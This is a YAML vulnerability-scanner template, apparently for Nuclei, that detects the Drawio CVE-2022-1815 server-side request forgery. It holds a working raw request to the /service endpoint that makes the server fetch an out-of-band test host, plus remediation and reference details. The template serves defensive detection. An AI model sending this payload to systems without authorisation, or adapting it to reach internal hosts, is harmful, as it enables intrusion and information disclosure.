45 lines
1.6 KiB
YAML
45 lines
1.6 KiB
YAML
id: CVE-2022-1815
|
|
|
|
info:
|
|
name: Drawio <18.1.2 - Server-Side Request Forgery
|
|
author: amit-jd
|
|
severity: high
|
|
description: |
|
|
Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability.
|
|
reference:
|
|
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
|
|
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
|
|
- https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-1815
|
|
cwe-id: CWE-200,CWE-918
|
|
epss-score: 0.00928
|
|
epss-percentile: 0.81166
|
|
cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: diagrams
|
|
product: drawio
|
|
tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /service/0/test.oast.me HTTP/2
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body, 'Interactsh Server')"
|
|
- status_code == 200
|
|
condition: and
|
|
|
|
# digest: 4a0a0047304502210084a673cb3d9693c64dcd287d511cac8921ba57d83a737b591561ae7504f67fe4022063e901873abd5f95833ee78cdbc10185a256988128db708d73abae1fcfd975be:922c64590222798bb761d5b6d8e72950
|